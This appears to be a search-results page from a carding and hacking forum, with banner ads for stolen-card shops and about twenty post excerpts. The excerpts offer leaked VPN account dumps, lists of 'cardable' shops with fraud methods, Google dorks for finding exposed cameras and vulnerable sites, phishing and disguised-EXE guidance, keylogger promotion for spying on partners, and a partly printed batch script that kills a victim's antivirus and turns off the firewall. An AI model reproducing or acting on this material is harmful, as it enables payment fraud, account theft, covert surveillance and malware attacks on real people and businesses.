Ad End 1 November 2025
Ad End 4 April 2026
banner Expire 10 August 2025
ad End 25 October 2025
Ad Ends 13 July 2025
banner Expire 25 October 2025
banner Expire 25 November 2025
What's new
banner Expire 23 August 2025
Wizard's shop 2.0
Money Club cc shop
banner Expire 15 January 2025
banner Expire 20 October 2024
UniCvv
Yale Lodge
Kfc CLub
Carding.pw carding forum
BidenCash Shop

Search results

  1. File_closed07

    Top 10 Important command prompt’s commands

    In this tutorial i will guide you to top 10 important and famous command prompt commands with their usage. 1. ipconfig : This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system...
  2. File_closed07

    Lock KeyBoard and Mouse Using VB .NET

    This Code will lock the Keyboard and Mouse Using SendKeys function.Just compile it in VB.NET.
  3. File_closed07

    50 Fresh New Nord Vpn Accounts

    50 Fresh New Nord Vpn Accounts https://pst.klgrth.io/paste/po3fk https://justpaste.it/64b4m
  4. File_closed07

    72 Express Vpn Accounts!

    72 Express Vpn Accounts! https://pst.klgrth.io/paste/vxhes https://justpaste.it/3k1h5
  5. File_closed07

    18k Gold Jewelry 4 Cardable Sites Easy

    https://www.dellafora.com/ https://tskies.com/ https://www.oakandluna.com/ https://www.shesaidyes.com/ Method: Bill = Shop Ip: Cc location Vpn: Vypr Or Expressvpn
  6. File_closed07

    Cardable Site Gaming Room Light With Proof

    Site: https://virallights.com/ Method: Cardable with pub cc - Bill = Ship Ip: Usa
  7. File_closed07

    How to hack into Security Cameras! and control the Cameras ?

    Hi now hack the security cameras of companies. This tutorial will help you to do that.’ Step 1: Go to Google! http://www.google.com Step 2: Enter one of the following lines: (Note, Do not enter the whole lot, that won’t work!) * inurl:”CgiStart?page=” * inurl:/view.shtml * intitle:”Live View /...
  8. File_closed07

    Use Original Domain Address for Phishing Web page

    Hi friends , you may have known about how to create phishing web Page. If you don’t know about Phishing Web Page, you need to read this tutorials first: Different Types of Email account How To Create fake or phishing web page Once you know the basics of Phishing web Page ,come to this...
  9. File_closed07

    How to find the IP address and Domain Name using cmd?

    This trick will help you to find the ip of the domain How to Find? Go to Start->run->cmd now type as “nslookup domain_name” It will show the IP address of Domain.
  10. File_closed07

    Download Widestep elite Keylogger 7.0 [Free]

    You may need keylogger in this following situation: you are a caring parent and need to know whom your kids are talking to or what websites they are visiting while you’re away you are suspecting your spouse/ girlfriend or boyfriend in cheating. Key logger You may need keylogger for...
  11. File_closed07

    A simple batch program for Port Scanning

    Hi friends in this post we are going to see how to create Batch programming for port scanning. Open Notepad Paste this code: @ECHO off color 0a cd C: cls for /L %%v in (1,1,11) do telnet %1 %%v GOTO scan2 :scan2 for /L %%w in (12,1,20) do telnet %1 %%w Save it with .bat extension(for eg...
  12. File_closed07

    How to hack the Computer using Hardware Keylogger?

    So far we have seen about the Keylogger software, now i am introducing Hardware key logger to my readers. If you don’t know about key logger ,please read this article. What is Key logger? What is Malicious softwares? Drawbacks of Key logger Software: Easily detectable User can block the...
  13. File_closed07

    COMMON METHODS USED FOR WEBSITE HACKING

    Remote File Inclusion or RFI SQL injection Cross site scripting or XXS Local file inclusion or LFI Directory Traversal attack RFI: RFI stands for Remote File Inclusion and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability...
  14. File_closed07

    Introduction to Social Engineering world | Hack the people

    What is Social Engineering? Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to...
  15. File_closed07

    How to Find a vulnerable website?

    Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks. Small List of Google Dork: inurl:index.php?id= inurl:gallery.php?id= inurl:post.php?id= inurl:article?id= Download A large list of Google dork from here copy one from above...
  16. File_closed07

    Fake virus for making fun with your friends

    Hi friends, you probably don’t want to harm your friend pc but you like to fun with them. If you think so, then you can use this fake virus. Fake virus what i mean? This is not at all virus. This is not at all make any effect. It just shut down your friend system for only once and show ” your...
  17. File_closed07

    How to send the EXE file as text file?

    1. First of all You have to download the TEXT ICON PACK . You can Download It From Below: Download 2. Extract the Icon Pack to Obtain the Text Icons. 3. Open a new file, Right click – New – Shortcut Type the location of the item: “X:WINDOWSsystem32cmd.exe /c file.txt” (where stands for...
  18. File_closed07

    Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit

    First Check whether the Website is vulnerable or not( if you don’t know how to do it, read this) Or simply copy this code to google and hit enter: inurl:/portals/0 Open the home page and check any image which is located in /portals/0/ Check the location of the image. It should be located in...
  19. File_closed07

    How to disable/delete your victim’s Antivirus?

    Here i am giving you the batch program to disable or delete the antivirus in victims computer. @ echo off rem — rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard...
  20. File_closed07

    Hacking is Art of Exploitation

    Hacking is Art of Exploitation DukLoad
Ad End 1 November 2024
Top